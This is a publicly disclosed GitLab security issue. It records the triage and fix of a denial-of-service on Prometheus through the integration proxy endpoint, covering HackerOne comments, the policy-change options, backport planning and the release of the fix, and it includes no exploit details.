DOS and high resource consumption of Prometheus server through abuse of Prometheus integration proxy endpoint

changed due date to April 26, 2023

added HackerOne WeaknessCWE-400 bugvulnerability priority3 security severity3 typebug labels

HackerOne comment by h1_analyst_maximillian:

Hey [@]joaxcar,

Thank you for your report!

After review, there doesn’t seem to be any security risk and/or security impact as a result of the behavior you are describing.

Server side Denial Of Service with a temporary impact on performance that can be solved by tuning application limits or additional rate limiting OOS Per Program Policy.

As a result, we will be closing this report as informative. If you are able to leverage this into a practical exploitation scenario, we will be happy to reevaluate this report.

This will not have any impact on your Signal or Reputation score. We appreciate your effort and look forward to seeing more reports from you in the future.

Kind regards,

[@]h1_analyst_maximillian

HackerOne comment by h1_analyst_maximillian:

Hi [@]joaxcar,

Thank you for your report!

Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you. Report is a duplicate and was closed out as informative originally in error. We apologize for any misunderstanding regarding this.

We look forward to seeing more reports from you in the future.

Due to program restrictions, we are unfortunately not able to add you to the original report. Thank you for your understanding.

Have a great day ahead!

Best regards,

[@]h1_analyst_maximillian

HackerOne comment by joaxcar:

Hi [@]h1_analyst_maximillian , this is not a duplicate of the linked report (the other one is mine as well). And the same information goes for this one. There are no mitigating settings to use against this DOS, and thus I think the team should look at it.

/Johan

HackerOne comment by joaxcar:

Hi again [@]h1_analyst_maximillian , I would like to get an explanation for what part of my report that falls under temporary impact on performance that can be solved by tuning application limits or additional rate limiting and what those mitigations are? As I tried to explain as far as I can see there are no such options for users hosting a GitLab instance, and none in place at GitLab.com either

best regards Johan

added grouprespond label

added devopsmonitor sectionops labels

cc: @splattael @syasonik. This report appears to be a bypass as it exploits the DoS query in the same manner as #378456 (closed). This report is ultimately distinct from that report in that it solely targets Prometheus instead of Grafana. Note that our fix only addressed Grafana.

@truegreg Yes, you are right! I've completely missed the Prometheus::ProxyService last time

We have two services to proxy queries to Prometheus:

As mentioned, we only fixed Grafana. The other service is defined in Metrics::Dashboard::PrometheusApiProxy which is used by two controllers:

ClustersController via include Metrics::Dashboard::PrometheusApiProxy
PrometheusApiController via include Metrics::Dashboard::PrometheusApiProxy

The /proxy path (prometheus_proxy method in the PrometheusApiProxy module) is protected by read_prometheus policy ability. Previously, we only adjusted read_grafana policy ability.

I see two options:

Similar to <code data-sourcepos="14:17-14:28">read_grafana</code> fix disallow read_prometheus for Guests on public projects.
Alternatively, consolidate read_grafana with read_prometheus. Bascially, rename read_grafana to read_prometheus.

The patch for 1. might be smaller and more fitting for security release. We could follow-up with 2. if we want to

Either course of action seems good to me. Thank you for the quick triage, @splattael .

Note that the vulnerability only impacts PrometheusApiController.

ClustersController is protected by admin_cluster ability (maintainer level).

@fastalana @francoisrose This issue is ready for triage as per HackerOne process.

If this vulnerability is for a featureflagdisabled issue, regular SLOs don't apply and it simply should be scheduled to be fixed before the feature is made generally available.

The due date for this is April 26, but the corresponding features are actually scheduled for removal in %16.0 (starts April 22).

So we could:

Fix this in 15.10 or 15.11 (options outlined in #392665 (comment 1286408615))
Hold of until removal in %16.0 (which will fall within the "next 3 quarters" SLO for resolution

If we wanted to prepare removal MRs early in %15.11, we could even have this resolved immediately at the start of %16.0. We just want to make sure that we've removed the bugvulnerability in %16.0, even if we don't get through 100% of the code removal.

I personally think we should defer to removal. So I've added this to %15.11 for now, to serve as a reminder that we'll want to prepare for this & cross-linked to Technical Breakdown for Monitor: Metrics Removal (gitlab-org/monitor/respond#109 - closed).

/cc @francoisrose @splattael

Thanks @syasonik. I would lean towards option 2 as well, it seems sufficient at least for gitlab.com. But I do wonder about the consequences for self-managed. Those users that stay below 16.0 will still be exposed. Since the feature is to be removed in 16.0, self-managed users who do rely on it might even be reluctant to upgrade to 16.x, which makes a fix in 15.x more critical.

I don't know what our typical look-back window is for security fixes in older GitLab versions. @truegreg any pointers on that would be helpful to make a decision here. How would you typically reason about fixes like this for SaaS vs self-managed?

Those users that stay below 16.0 will still be exposed

@francoisrose, most of the writing on how we reason about backports can be found here and here. I'm leaning on the docs here because, honestly, this is something that I find myself referring to a lot and I really can't see myself explaining it better than what we have written.

The TL;DR for this is that we typically perform backports for the current version + the previous 2 monthly releases. When considering SaaS vs self managed, we can opt not to ship backports if it affects only us. As soon as it affects self managed, we follow the usual schema (current and previous 2).

^^Super helpful. With that in mind @francoisrose, I think we should pull this into %15.10!

@splattael Would you be game to knock out the fix & backports this milestone?

Would you be game to knock out the fix & backports this milestone?

Yes

most of the writing on how we reason about backports can be found here and here.

@truegreg That's exactly what I was looking for, thanks a lot for sharing those links

With that in mind @francoisrose, I think we should pull this into %15.10!

@syasonik Agreed!

assigned to @splattael

changed milestone to %15.11

mentioned in issue gitlab-org/monitor/respond#109 (closed)

changed milestone to %15.10

mentioned in issue gitlab-org/monitor/respond#199 (closed)

@splattael I am moving this to 15.11

cc @francoisrose

@kbychu I was planning to submit security MRs by tomorrow and if they (including backports) get approved by Friday it's likely they will be released in 15.10.x security release which is - technically - still %15.10?

Ah ok, thanks for the info @splattael. Moving this back to 15.10.

changed milestone to %15.11

changed milestone to %15.10

added Category:Metrics label

Update:

4 MRs (including backports) submitted - see https://gitlab.com/gitlab-org/security/gitlab/-/issues/861#related-merge-requests
Approved by backend maintainer (shout out to @ck3g )
Pending AppSec review

added security-issue-escalated label

@kbychu @francoisrose @fvpotvin This severity3 bugvulnerability issue's milestone has expired. The security-issue-escalated label has been applied.

All MRs were merged on time.

Removing security-issue-escalated.

See https://about.gitlab.com/releases/2023/03/30/security-release-gitlab-15-10-1-released/

removed security-issue-escalated label

Fixed, merged and released. See https://about.gitlab.com/releases/2023/03/30/security-release-gitlab-15-10-1-released/

Closing

closed

mentioned in issue #389477 (closed)

@fvpotvin - this bugvulnerability issue was closed 30 days ago and should be made public. Please follow the process for disclosing security issues.

If the issue needs to stay confidential, please add the keep confidential label.

Ensure you redact confidential data the researcher might have submitted, like IP addresses, before making it public.

If you removed confidential data from the issue description before making it public, make sure that the description history entry is deleted.

@gitlab-com/gl-security/appsec - this bugvulnerability issue should have been made public 14 days ago. Please follow the process for disclosing security issues

made the issue visible to everyone

DOS and high resource consumption of Prometheus server through abuse of Prometheus integration proxy endpoint

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

Report

Summary

Prometheus feature

The setup

The attack

Some details

Result

Steps to reproduce

Impact

What is the current bug behavior?

What is the expected correct behavior?

Output of checks

Results of GitLab environment info

Impact

Impact

Attachments

How To Reproduce

Designs

Child items 0

Activity